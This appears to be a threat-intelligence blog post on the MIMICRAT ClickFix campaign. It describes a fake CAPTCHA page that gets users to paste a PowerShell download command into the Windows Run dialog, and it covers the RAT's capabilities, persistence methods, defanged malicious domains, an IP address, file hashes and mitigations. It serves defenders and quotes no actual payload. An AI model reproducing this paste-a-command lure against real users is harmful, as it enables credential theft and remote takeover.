Follow on X RSS Feed
Malware

MIMICRAT Campaign Uses Fake Verification Lure

Cybersec Sentinel

3 min read
MIMICRAT Campaign Uses Fake Verification Lure

Threat Group – Unknown financially motivated operators
Threat Type – Remote Access Trojan and social engineering campaign
Exploited Vulnerabilities – User driven execution abuse of Windows Run dialog and PowerShell
Malware Used – MIMICRAT
Threat Score – 8.2 🔴 High
Last Threat Observation – February 2026, reported by multiple security research teams including Securonix and independent threat intelligence analysts

Overview

The MIMICRAT ClickFix campaign represents a sophisticated evolution of social engineering driven malware delivery. Rather than exploiting software vulnerabilities, this campaign manipulates users into executing malicious commands themselves through a fake CAPTCHA verification workflow. The technique abuses legitimate Windows functionality and leverages PowerShell to retrieve and execute payloads directly in memory.

The campaign has been observed targeting enterprise users across finance, technology, logistics, and government sectors. Its success relies heavily on deception and user trust in familiar web interaction patterns. Victims encounter a malicious webpage that presents a fake verification prompt. Instead of completing a real CAPTCHA challenge, users are instructed to copy and paste a command into the Windows Run dialogue box.

Once executed, the command downloads and runs the MIMICRAT payload, establishing persistence and enabling full remote access capabilities.

This technique significantly reduces reliance on traditional exploit chains and instead focuses on bypassing security awareness through psychological manipulation.

Key Details

Delivery Method

Fake CAPTCHA prompt known as ClickFix technique
Malicious website redirect via phishing emails or compromised legitimate sites
Clipboard injection instructions directing users to execute PowerShell commands

Target

Corporate users in enterprise Windows environments
Finance and legal firms
Technology providers
Public sector organisations

Functions

• Establishes remote command execution capability
• Harvests credentials from browsers and memory
• Enables screen capture and keylogging
• Deploys secondary payloads including information stealers
• Maintains persistence via registry modification and scheduled tasks

Obfuscation

The PowerShell payload is Base64 encoded
Commands are split across variables to evade detection
Execution occurs in memory to reduce file based detection
C2 infrastructure rotates domains frequently

Attack Vectors

The infection chain begins when a user visits a compromised or malicious website. The site displays a prompt stating that suspicious activity has been detected and requests verification.

Instead of presenting a legitimate CAPTCHA widget, the page displays instructions:

  1. Press Windows Key + R
  2. Paste the copied code
  3. Press Enter

The copied content contains a PowerShell command that retrieves a remote script. The script downloads the MIMICRAT loader, decrypts the embedded payload, and executes it directly in memory.

Once active, MIMICRAT initiates beaconing to its command and control server. It enumerates system information, checks for virtualisation environments, and begins credential harvesting routines.

Persistence mechanisms include:

Registry Run keys
Scheduled tasks
WMI event subscriptions

The malware can then receive operator commands including file exfiltration, additional malware staging, and lateral movement attempts.

Known Indicators of Compromise

MimicRat Related Domains

  • xmri[.]network
  • investonline[.]in
  • wexmri[.]cc

Related Hostnames

  • www[.]investonline[.]in
  • www[.]ndibstersoft[.]com

Associated IPv4 Addresses

  • 45[.]13[.]212[.]250

MD5 File Hashes

  • 5d14aa8bbfb6c505800a5fe17769334a
  • 9c48d9bf0b48260ce529156069eeb88d
  • 85eda483941b11ddcdad3d8b0cdfd702
  • c55a38222841ccdaa943c289ece55701

SHA1 File Hashes

  • 472d725ae60c4ae141ff53fe175abb80f6f1d7af
  • 5dc6a659001d320f42ed06401d15770c7c159031
  • 672da4a2fb54964ea52eba5e5e35b8e244f8567a
  • e2ac078090bb66be60344c5d0e74eb621d88d8de
  • a4ce2eaeb144328c973e99614662a772b998faf6

SHA256 File Hashes

  • 5e0a30d8d91d5fd46da73f3e6555936233d870ac789ca7dd64c9d3cc74719f51
  • a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b
  • 055336daf2ac9d5bbc329fd52bb539085d00e2302fa75a0c7e9d52f540b28beb
  • bcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1

Mitigation and Prevention

Mitigation Checklist

User Awareness
Train users never to paste commands into the Run dialogue or PowerShell from websites

Email Filtering
Block phishing emails containing suspicious links
Implement URL rewriting and sandbox detonation

Antivirus Protection
Enable behavioural detection for PowerShell misuse
Ensure endpoint detection and response telemetry is active

Two Factor Authentication 2FA
Deploy MFA across all privileged and user accounts

Log Monitoring
Monitor for unusual PowerShell invocation from user context
Detect Base64 encoded command execution

Regular Updates
Maintain updated endpoint security tools
Patch browsers and operating systems

Risk Assessment

The MIMICRAT ClickFix campaign scores 8.2 High due to its effectiveness, adaptability, and reliance on legitimate system tools. While not exploiting zero day vulnerabilities, the campaign bypasses traditional exploit prevention controls and relies on social engineering precision.

The use of user executed PowerShell significantly reduces detection by signature based tools. Combined with rotating infrastructure and encrypted payload staging, it presents a credible enterprise risk.

Organisations without strong endpoint detection and behavioural monitoring may struggle to identify initial compromise.

The primary weakness of the campaign is its reliance on user interaction. Strong security awareness programs can significantly reduce infection rates.

Conclusion

The MIMICRAT ClickFix campaign demonstrates a growing shift toward user assisted malware deployment. Rather than breaching systems through technical exploits, threat actors are weaponising normal user workflows.

Organisations must prioritise behavioural monitoring, user training, and strict PowerShell execution controls. Disabling unnecessary scripting capabilities and enforcing application control policies will significantly reduce exposure.

This campaign reinforces a clear lesson. The human factor remains the most targeted attack surface in modern cybersecurity operations.

Sources

Elastic Security Labs – MIMICRAT ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites – https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks

Microsoft Security Blog – Think before you ClickFix Analyzing the ClickFix social engineering technique – https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

CERT Polska – ClickFix in action how fake captcha can lead to a company compromise – https://cert.pl/en/posts/2026/02/fake-captcha-in-action/

The Hacker News – ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware – https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html

OTX AlienVault – Indicators of Compromise MIMICRAT ClickFix Campaign – https://otx.alienvault.com/pulse/699874fdcc7eaabe6bb130ac